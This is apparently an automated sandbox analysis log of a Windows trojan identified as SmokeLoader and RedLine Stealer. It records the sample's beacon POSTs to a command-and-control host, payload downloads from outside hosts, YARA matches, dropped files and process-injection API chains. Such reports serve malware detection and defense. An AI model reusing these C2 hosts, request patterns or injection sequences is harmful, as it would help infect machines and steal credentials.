      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bexxetwrlu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrsfqkp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vorjorv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyenmgvrby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://exqejm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slnpxfm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nnpxrhckg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dotgqhetjk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkovywjrdl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: gayworld.at
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 213.227.155.16
      Source: unknownTCP traffic detected without corresponding DNS query: 213.227.155.16
      Source: unknownTCP traffic detected without corresponding DNS query: 213.227.155.16
      Source: explorer.exe, 00000001.00000000.360118573.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340593765.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311877764.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqhcrffxeq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: gayworld.at
      Source: unknownDNS traffic detected: queries for: gayworld.at
      Source: global trafficHTTP traffic detected: GET /d/aS1IzKYGKL0Ctw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: disk.yandex.ru
      Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
      Source: unknownHTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.5:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49730 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: file.exe, 00000000.00000002.378803920.000000000064A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022030_2_00402203
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022090_2_00402209
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B0_2_0040221B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021E70_2_004021E7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ECD00_2_0040ECD0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004168A90_2_004168A9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417D4E0_2_00417D4E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E6480_2_0040E648
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E210_2_00415E21
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004163650_2_00416365
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060226A0_2_0060226A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006022700_2_00602270
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060224E0_2_0060224E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006022820_2_00602282
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004022032_2_00402203
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004022092_2_00402209
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040221B2_2_0040221B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004021E72_2_004021E7
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040ECD02_2_0040ECD0
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004168A92_2_004168A9
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00417D4E2_2_00417D4E
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040E6482_2_0040E648
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00415E212_2_00415E21
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004163652_2_00416365
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0053224E2_2_0053224E
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_005322702_2_00532270
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0053226A2_2_0053226A
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_005322822_2_00532282
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040ECD06_2_0040ECD0
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004168A96_2_004168A9
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00417D4E6_2_00417D4E
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_0040E6486_2_0040E648
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00415E216_2_00415E21
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004163656_2_00416365
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_00416FA16_2_00416FA1
      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00409480 appears 32 times
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: String function: 00409480 appears 44 times
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: String function: 00409480 appears 32 times
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040143B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040143B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401446 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401446
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040145D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401460 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401460
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040146B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040146B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402203 NtOpenKey,0_2_00402203
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402209 NtOpenKey,0_2_00402209
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B NtOpenKey,0_2_0040221B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F3B NtClose,RtlInitUnicodeString,CreateFileMappingW,OpenProcessToken,NtOpenProcess,towlower,0_2_00402F3B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021E7 NtOpenKey,0_2_004021E7
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040143B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_0040143B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00401446 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_00401446
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_0040145D
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00401460 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_00401460
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040146B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,2_2_0040146B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402203 NtOpenKey,2_2_00402203
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402209 NtOpenKey,2_2_00402209
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_0040221B NtOpenKey,2_2_0040221B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402F3B NtClose,RtlInitUnicodeString,CreateFileMappingW,OpenProcessToken,NtOpenProcess,NtCreateSection,NtAllocateVirtualMemory,NtDuplicateObject,NtOpenKey,NtEnumerateKey,RtlCreateUserThread,strstr,2_2_00402F3B
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004021E7 NtOpenKey,2_2_004021E7
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\586.exe EEF63539D65A5A8A2285B41A318B495AC283DF69519FBBFE14813B3990F7CFC2
      Source: file.exeReversingLabs: Detection: 43%
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ichffhi C:\Users\user\AppData\Roaming\ichffhi
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\586.exe C:\Users\user\AppData\Local\Temp\586.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\586.exe C:\Users\user\AppData\Local\Temp\586.exeJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ichffhiJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\586.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@4/3@37/10
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00656F65 CreateToolhelp32Snapshot,Module32First,0_2_00656F65
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\fuw\riboz.pdb source: 586.exe, 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr
      Source: Binary string: C:\tuvapehib\puvomufewade\sehem\jizef.pdb source: file.exe, ichffhi.1.dr
      Source: Binary string: s_C:\fuw\riboz.pdb source: 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ichffhiUnpacked PE file: 2.2.ichffhi.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E40 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E4F push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E55 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E7F push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F03 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F3B push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC4 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EDA push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE5 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EEB push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EB5 push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EBD push eax; ret 0_2_00402F17
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004094C5 push ecx; ret 0_2_004094D8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A900 push edi; ret 0_2_0065A955
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E40 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E4F push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E55 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402E7F push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402F03 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402F3B push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EC4 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EDA push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EE5 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EEB push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EB5 push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_00402EBD push eax; ret 2_2_00402F17
      Source: C:\Users\user\AppData\Roaming\ichffhiCode function: 2_2_004094C5 push ecx; ret 2_2_004094D8
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004094C5 push ecx; ret 6_2_004094D8
      Source: C:\Users\user\AppData\Local\Temp\586.exeCode function: 6_2_004135BD LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,6_2_004135BD
